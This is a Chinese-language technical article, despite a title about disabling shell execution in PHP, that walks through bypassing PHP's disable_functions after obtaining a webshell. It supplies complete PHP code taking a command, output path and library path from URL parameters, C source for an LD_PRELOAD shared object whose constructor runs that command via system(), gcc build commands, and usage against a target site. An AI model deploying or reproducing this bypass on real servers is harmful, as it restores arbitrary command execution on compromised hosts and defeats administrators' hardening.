PHP中怎么禁用執行Shell代碼
發(fā)布時(shí)間:2021-09-14 11:25
來(lái)源:億速云
閱讀:0
作者:Leah
欄目: 網(wǎng)絡(luò )安全
本篇文章為大家展示了PHP中怎么禁用執行Shell代碼���,內容簡(jiǎn)明扼要并且容易理解��,絕對能使你眼前一亮��,通過(guò)這篇文章的詳細介紹希望你能有所收獲�����。
一���、問(wèn)題描述
Getshell時(shí)無(wú)法執行系統命令
二�����、直接利用過(guò)程
將bypass_disablefunc.php 和 bypass_disablefunc_x64.so共享文件傳到目標上����,指定三個(gè)參數構造URL��。
http://site.com/bypass_disablefunc.php?cmd=命令執行輸入&outpath=outpath&sopath=sopath
一是 cmd 參數����,待執行的系統命令����;
二是 outpath 參數����,保存命令執行輸出結果的文件路徑(如 /tmp/xx)�,便于在頁(yè)面上顯示�����,另外該參數���,你應注意 web 是否有讀寫(xiě)權限���、web 是否可跨目錄訪(fǎng)問(wèn)��、文件將被覆蓋和刪除等幾點(diǎn)�����;
三是 sopath 參數����,指定劫持系統函數的共享對象的絕對路徑(如 /var/www/bypass_disablefunc_x64.so)(上傳時(shí)指定)���,另外關(guān)于該參數���,你應注意 web 是否可跨目錄訪(fǎng)問(wèn)到它��。
前提:
了解系統信息����,如果系統不是debian���、x64同類(lèi)型的linux系統則需要重新編譯
bypass_disablefunc_x64.so 為執行命令的共享對象�����,
用命令 gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so
將 bypass_disablefunc.c 編譯而來(lái)�。 若目標為 x86 架構����,需要加上 -m32 選項重新編譯�,bypass_disablefunc_x86.so���。
保證:outpath文件路徑web 是否有讀寫(xiě)權限�����、web 是否可跨目錄訪(fǎng)問(wèn)�、文件將被覆蓋和刪除等幾點(diǎn)�����;
三���、代碼執行過(guò)程描述
1�����、先把惡意shell指令寫(xiě)成cmd >/tmp/xx 2>&1���,以便讀取返回信息及錯誤信息���;
2���、通過(guò)寫(xiě)入新的環(huán)境變量EVIL_CMDLINE(系統不存在����,工程生成)�����,從而傳遞惡意shell指令給予共享文件等待執行����;
3�����、通過(guò)寫(xiě)入LD_PRELOAD環(huán)境變量來(lái)使準備好的共享文件代碼優(yōu)先加載�����;
4�、通過(guò)mail函數觸發(fā)共享文件加載����;
共享文件內容工作:通過(guò)__attribute__ ((__constructor__))修飾符修飾函數使得共享文件一旦被加載就會(huì )執行�,無(wú)論觸發(fā)加載函數(這里使用的mail)是否執行成功與否��、第三方插件是否存在����,只要加載即執行
5�����、共享文件被加載���,__attribute__ ((__constructor__))修飾的系統函數會(huì )比觸發(fā)加載的第三方插件函數先執行���。在執行系統函數system(cmdline)前����,使用extern char** environ打斷共享文件的二次加載(不然第二次加載的構造函數再執行到系統函數system(cmdline)前又第三次加載該共享文件�����,往返���,從而到達無(wú)限循環(huán))�����。
6�、命令的二進(jìn)制文件順利在系統的內存中被執行�,執行的結果或錯誤信息都記錄到/tmp/xx文件中���。
7��、通過(guò)nl2br(file_get_contents($out_path)) 句子分行的顯示在網(wǎng)頁(yè)頁(yè)面上�����,最后通過(guò)unlink刪除文件����,等待下一次的寫(xiě)入��、顯示���。
四���、代碼預覽
bypass_disablefunc.php文件——傳遞惡意shell命令���、設置最實(shí)現最高級加載����、顯示命令執行情況
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";#第一步
putenv("EVIL_CMDLINE=" . $evil_cmdline);#第二步
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);#第三步
mail("", "", "", "");#第四步
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);第七步
?>bypass_disablefunc_x64.so文件的C語(yǔ)言代碼——執行惡意shell指令
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
extern char** environ;
__attribute__ ((__constructor__)) void preload (void)
{
// get command line options and arg
const char* cmdline = getenv("EVIL_CMDLINE");
// unset environment variable LD_PRELOAD.
// unsetenv("LD_PRELOAD") no effect on some
// distribution (e.g., centos), I need crafty trick.
int i;
for (i = 0; environ[i]; ++i) {
if (strstr(environ[i], "LD_PRELOAD")) {
environ[i][0] = '\0';
}
}
// executive command
system(cmdline);
}五�、代碼分析
01目的:編寫(xiě)在系統調用第三方組件函數前先執行的函數
02操作
共享對象文件使用c語(yǔ)言來(lái)編寫(xiě)
共享的函數使用__attribute__ ((__constructor__)) 進(jìn)行修飾
__attribute__ ((__constructor__)) void preload (void)
03基礎概念
GCC 有個(gè) C 語(yǔ)言擴展修飾符 __attribute__((constructor))�����,可以讓由它修飾的函數在 main() 之前執行���,若它出現在共享對象中時(shí)�,那么一旦共享對象被系統加載�����,立即將執行 �。
01目的:停止環(huán)境變量對system(cmdline)函數執行前的打斷
02操作:
共享文件C語(yǔ)言中加入以下代碼����,通過(guò)改環(huán)境寫(xiě)入\0進(jìn)行清空環(huán)境變量
extern char** environ ���;
int i��;
for (i = 0; environ[i]; ++i) { if (strstr(environ[i], "LD_PRELOAD")) { environ[i][0] = '\0'; } }03基礎概念
每個(gè)程序都有一個(gè)環(huán)境表�,它是一個(gè)字符指針數組��,其中每個(gè)指針包含一個(gè)以NULL結尾的C字符串的地址����。全局變量environ則包含了該指針數組的地址:externchar **environ;
在調用system(cmdline);會(huì )又使得LD_PRELOAD再加載自身��,這就陷入無(wú)限循環(huán)�����。因此寫(xiě)入\0�����,對函數執行的環(huán)境變量修改����,打斷LD_PRELOAD再加載自身�,從而順利執行system(cmdline);
01目的:讀取環(huán)境變量中的惡意shell指令并執行
02操作:
共享文件C語(yǔ)言中加入以下代碼�、使用C語(yǔ)言調用的系統函數
const char* cmdline = getenv("EVIL_CMDLINE");
system(cmdline);03基礎概念
讀取環(huán)境變量函數及系統執行函數
getenv ( string $varname [, bool $local_only = FALSE ] ) : stringint
system(const char *command);
01目的:生成系統執行的二進(jìn)制文件��,供于被調用
02操作:
編譯動(dòng)態(tài)庫���、通過(guò)c語(yǔ)言編寫(xiě)功能函數�����,再使用GCC執行系統cmd命令
gcc -shared -fPIC -o 1.so 1.c
03基礎概念
在 windows 平臺和 Linux 平臺下都大量存在著(zhù)庫�����。
庫�,是一種可執行代碼的二進(jìn)制形式����,可以被操作系統載入內存執行�。
共享庫(動(dòng)態(tài)庫)的代碼是在可執行程序運行時(shí)才載入內存的���,在編譯過(guò)程中僅簡(jiǎn)單的引用��,因此代碼體積較小���。動(dòng)態(tài)通常用.so為后綴
-fPIC 作用于編譯階段�����,告訴編譯器產(chǎn)生與位置無(wú)關(guān)代碼(Position-Independent Code)���,則產(chǎn)生的代碼中�����,沒(méi)有絕對地址�,全部使用相對地址���,故而代碼可以被加載器加載到內存的任意位置����,都可以正確的執行�。這正是共享庫所要求的���,共享庫被加載時(shí)��,在內存的位置不是固定的����。
譯成 x86 架構需要加上 -m32 選項
01目的:惡意shell指令組合���,輸出結果和錯誤信息都記錄到指定地方/tmp/xx����,從而可以被讀取顯示結果或錯誤信息
02操作:
cmd >/tmp/xx 2>&1
03基礎概念:
2>&1 的意思就是將標準錯誤重定向到標準輸出��。
Linux的文件描述符--標準輸入輸出說(shuō)明
stdin��,標準輸入��,默認設備是鍵盤(pán)���,文件編號為0��。
stdout���,標準輸出���,默認設備是顯示器��,文件編號為1�����,也可以重定向到文件����。
stderr����,標準錯誤����,默認設備是顯示器�����,文件編號為2�����,也可以重定向到文件�����。
>&重定向符
01目的:設置環(huán)境變量的值���,傳遞惡意shell指令以及指定的動(dòng)態(tài)庫加載的優(yōu)先級最高
02操作:
putenv("EVIL_CMDLINE=" . $evil_cmdline);
putenv("LD_PRELOAD=bypass_disablefunc_x64.so");03基礎概念:
putenv ( string $setting ) : bool
添加 setting 到服務(wù)器環(huán)境變量�����。 環(huán)境變量?jì)H存活于當前請求期間��。 在請求結束時(shí)環(huán)境會(huì )恢復到初始狀態(tài)���。如果環(huán)境中沒(méi)有該服務(wù)器環(huán)境變量����,則會(huì )臨時(shí)存在����。
EVIL_CMDLINE在環(huán)境變量是不存在����,人為生成傳遞函數用
LD_PRELOAD的作用是為優(yōu)先加載庫設置
一般情況下�,庫加載順序為L(cháng)D_PRELOAD>LD_LIBRARY_PATH> /etc/ld.so.cache>/lib>/usr/lib�����。
LD_PRELOAD�、LD_LIBRARY_PATH都為環(huán)境變量���、/etc/ld.so.cache����、/usr/lib為文件目錄���;
01目的:觸發(fā)系統執行編寫(xiě)的二進(jìn)制文件�,執行__attribute__ ((__constructor__)) void preload (void)�����;
02操作:
mail("", "", "", "");
03基礎概念
mail() 函數允許您從腳本中直接發(fā)送電子郵件�����。
注:php代碼中只是為了創(chuàng )建新進(jìn)程���,觸發(fā)系統對LD_PRELOAD的加載��,因__attribute__ ((__constructor__)) 屬性的函數會(huì )優(yōu)先main函數先執行����,實(shí)際在該工程中mail不需要第三方sendmail的支持���;
01目的:讀取存入/tmp/xx的信息
02操作:
nl2br(file_get_contents($out_path))
03基礎概念:
file_get_contents — 將整個(gè)文件讀入一個(gè)字符串
file_get_contents ( string $filename [, bool $use_include_path = false [, resource $context [, int $offset = -1 [, int$maxlen ]]]] ) : string
和 file() 一樣���,只除了 file_get_contents() 把文件讀入一個(gè)字符串�����。將在參數 offset 所指定的位置開(kāi)始讀取長(cháng)度為maxlen 的內容����。如果失敗�����,file_get_contents() 將返回 FALSE�����。
nl2br() 函數在字符串中的每個(gè)新行(\n)之前插入 HTML 換行符(<br> 或 <br />)�����。
01目的:刪除文件
02操作:
unlink($out_path);
03基礎概念
unlink(filename,context)
定義和用法
unlink() 函數刪除文件�����。
如果成功�,該函數返回 TRUE�����。如果失敗���,則返回 FALSE��。
